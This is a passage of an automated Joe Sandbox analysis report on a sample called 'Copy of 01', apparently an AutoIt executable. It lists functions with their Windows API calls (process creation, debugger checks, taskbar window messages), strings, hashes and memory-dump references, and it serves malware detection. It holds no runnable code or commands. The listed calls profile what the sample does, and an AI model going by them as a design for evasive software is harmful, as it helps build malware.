                        • API String ID: 624084870-1403004172
                        • Opcode ID: 084e512d1cb449e771f2fa0d45c9a18b3d2ef7db145f1361b8ed2ff391a42947
                        • Instruction ID: 09ee02cf6a8c71d5b6c87e37047de10a89b8335ee6e52722fdecf847240d3207
                        • Opcode Fuzzy Hash: 084e512d1cb449e771f2fa0d45c9a18b3d2ef7db145f1361b8ed2ff391a42947
                        • Instruction Fuzzy Hash: 1D01A775685109A6DF07EB90CA91EFF77AC9F51340F14001AF5167B281EA609E08CAB1
                        Function 00391C5C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00339CB3: _wcslen.LIBCMT ref: 00339CBD
                          • Part of subcall function 00393CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00393CCA
                        • SendMessageW.USER32(?,00000182,?,00000000), ref: 00391CC8
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: ClassMessageNameSend_wcslen
                        • String ID: ComboBox$ListBox
                        • API String ID: 624084870-1403004172
                        • Opcode ID: d94f733863031bd06061a7e8930f52d6b2ebf2766d4d660f267b942df69ddf3d
                        • Instruction ID: 1d5ee1b10a49ab56900a229231c2451beda1a408f769b768846639653796a3b2
                        • Opcode Fuzzy Hash: d94f733863031bd06061a7e8930f52d6b2ebf2766d4d660f267b942df69ddf3d
                        • Instruction Fuzzy Hash: 7A01D6B6680119A7DF07EBA0CA41EFE77AC9B11340F540016B902BB281EAA09F08CA71
                        Function 0034A4D6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47COMMON
                        Download Yara Rule
                        APIs
                        • __Init_thread_footer.LIBCMT ref: 0034A529
                          • Part of subcall function 00339CB3: _wcslen.LIBCMT ref: 00339CBD
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: Init_thread_footer_wcslen
                        • String ID: ,%@$3y8
                        • API String ID: 2551934079-1164007899
                        • Opcode ID: ec8bab402d0757081e394135bbaaf566d43519f2a0a56730275b7d77f3e40e37
                        • Instruction ID: 53d87b3b6a72626cd2b77488f65d326774462e4c210e1e0b0dbcf4850e75cc4f
                        • Opcode Fuzzy Hash: ec8bab402d0757081e394135bbaaf566d43519f2a0a56730275b7d77f3e40e37
                        • Instruction Fuzzy Hash: D6012B31780A1097C517F768EE5BFAD33949B06711F4040AAF9056F2D3DEA0BD45869B
                        Function 003C8172 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 40processCOMMON
                        Download Yara Rule
                        APIs
                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00403018,0040305C), ref: 003C81BF
                        • CloseHandle.KERNEL32 ref: 003C81D1
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: CloseCreateHandleProcess
                        • String ID: \0@
                        • API String ID: 3712363035-863861157
                        • Opcode ID: 1ae6b5179de2cedf9dba8f5847400b2fc0d601d98ff4f1d45836bd2edaad1326
                        • Instruction ID: 685b577d86eb8b36efed367b18521faffc18f8adfa3467cb522af22990d96b7a
                        • Opcode Fuzzy Hash: 1ae6b5179de2cedf9dba8f5847400b2fc0d601d98ff4f1d45836bd2edaad1326
                        • Instruction Fuzzy Hash: 2FF03AB5641300BAE2216F61AC49FB73E5CEB06752F008471BA08E91A2D67A9E0483E8
                        Function 003B747E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: _wcslen
                        • String ID: 3, 3, 16, 1
                        • API String ID: 176396367-3042988571
                        • Opcode ID: d6f77451893602de22780862506e603e51c5b8af3f41718c4d14c6d4e9abb57d
                        • Instruction ID: 6707a5156badb25daf1692c6346c170a9b8aeb9f7a312435638e17aa4c72f315
                        • Opcode Fuzzy Hash: d6f77451893602de22780862506e603e51c5b8af3f41718c4d14c6d4e9abb57d
                        • Instruction Fuzzy Hash: FAE02B06608220209237127B9CC6DFF5689CFC5756710182BFE81C6276EB948DD193E0
                        Function 00390B15 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28windowCOMMON
                        Download Yara Rule
                        APIs
                        • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00390B23
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: Message
                        • String ID: AutoIt$Error allocating memory.
                        • API String ID: 2030045667-4017498283
                        • Opcode ID: 686ab64540e1c8308b67842534fda1b4ee8ae5ca6d51f6abcbf9a934ac8ff8f6
                        • Instruction ID: 0762136c92a177fafb23beeb5db5d13c48f0bd6b25d1ca3d8c18721c21b22528
                        • Opcode Fuzzy Hash: 686ab64540e1c8308b67842534fda1b4ee8ae5ca6d51f6abcbf9a934ac8ff8f6
                        • Instruction Fuzzy Hash: A0E0D8312443083ED21B36947C43FC97AC48F05B11F14442AFB8C9D4D38BE1789047A9
                        Function 00350D42 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 0034F7C9: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00350D71,?,?,?,0033100A), ref: 0034F7CE
                        • IsDebuggerPresent.KERNEL32(?,?,?,0033100A), ref: 00350D75
                        • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0033100A), ref: 00350D84
                        Strings
                        • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00350D7F
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
                        • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                        • API String ID: 55579361-631824599
                        • Opcode ID: 20ea3b815226ca240a4891a37145b8d4c2babe2c26b4ce4c06b11a30787ca306
                        • Instruction ID: a7769486690d2e9fdc078ed1d81599a9e5c73caeabcc7fd4c48a33a9349c9e9f
                        • Opcode Fuzzy Hash: 20ea3b815226ca240a4891a37145b8d4c2babe2c26b4ce4c06b11a30787ca306
                        • Instruction Fuzzy Hash: B8E092742003418FD7369FB8D544B827BF4AF00741F044D2DE886CA661DBB6F8488B91
                        Function 0034E398 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21COMMON
                        Download Yara Rule
                        APIs
                        • __Init_thread_footer.LIBCMT ref: 0034E3D5
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: Init_thread_footer
                        • String ID: 0%@$8%@
                        • API String ID: 1385522511-2711268310
                        • Opcode ID: 79d36dcca685fd563fce98412caf7460a083411f35536b6dd03d47a7ec1e992c
                        • Instruction ID: 7c91f3662d1fbad59474b8ca6ccb2ccac7df5af1a5fba31d525e1fb5f02760f1
                        • Opcode Fuzzy Hash: 79d36dcca685fd563fce98412caf7460a083411f35536b6dd03d47a7ec1e992c
                        • Instruction Fuzzy Hash: 03E08639414910EBC60B9B18BF5DE8A3395FB05320F9151B5F512AF1E29BB53841865D
                        Function 0038D21C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17timeCOMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: LocalTime
                        • String ID: %.3d$X64
                        • API String ID: 481472006-1077770165
                        • Opcode ID: 894534f987653bc3fd3e8896a851242a329b4f6071cb4465946ee8e782d5df67
                        • Instruction ID: 54f341bef324f242a3c5cf808e0d992840424539952f5f5773c7cac024ab7e69
                        • Opcode Fuzzy Hash: 894534f987653bc3fd3e8896a851242a329b4f6071cb4465946ee8e782d5df67
                        • Instruction Fuzzy Hash: 4BD01271808208F9CB52B6D0DC49CB9B3BCFB08301F608892F906D2880D624D5086761
                        Function 003C2322 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                        Download Yara Rule
                        APIs
                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 003C232C
                        • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 003C233F
                          • Part of subcall function 0039E97B: Sleep.KERNEL32 ref: 0039E9F3
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: FindMessagePostSleepWindow
                        • String ID: Shell_TrayWnd
                        • API String ID: 529655941-2988720461
                        • Opcode ID: 69303dc77eb4bb709c23abc2a26de169ec0766ed836fa8dc4d6401db74f48c98
                        • Instruction ID: dab4a4ee6de4e8d93c9ff4417ac48dabb561287415caba183f92ebfe205aa43b
                        • Opcode Fuzzy Hash: 69303dc77eb4bb709c23abc2a26de169ec0766ed836fa8dc4d6401db74f48c98
                        • Instruction Fuzzy Hash: C6D012367A4310B7E665B771DC0FFD6BA189B40B14F005916F74AEA1D0C9F4B805CB54
                        Function 003C2356 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                        Download Yara Rule
                        APIs
                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 003C236C
                        • PostMessageW.USER32(00000000), ref: 003C2373
                          • Part of subcall function 0039E97B: Sleep.KERNEL32 ref: 0039E9F3
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: FindMessagePostSleepWindow
                        • String ID: Shell_TrayWnd
                        • API String ID: 529655941-2988720461
                        • Opcode ID: 244e71142076a0ca28674325e2b4b8582da27e6eb8f90a28b0f8a384e8bf2f88
                        • Instruction ID: 97d73e884ce49b4719df8c014e665cdf139924e4f3d311793e8b9aded24cf457
                        • Opcode Fuzzy Hash: 244e71142076a0ca28674325e2b4b8582da27e6eb8f90a28b0f8a384e8bf2f88
                        • Instruction Fuzzy Hash: 39D0C9327913107AE666B7719C0FFC6A6189B45B14F005916B74AEA1D0C9A4B8058B58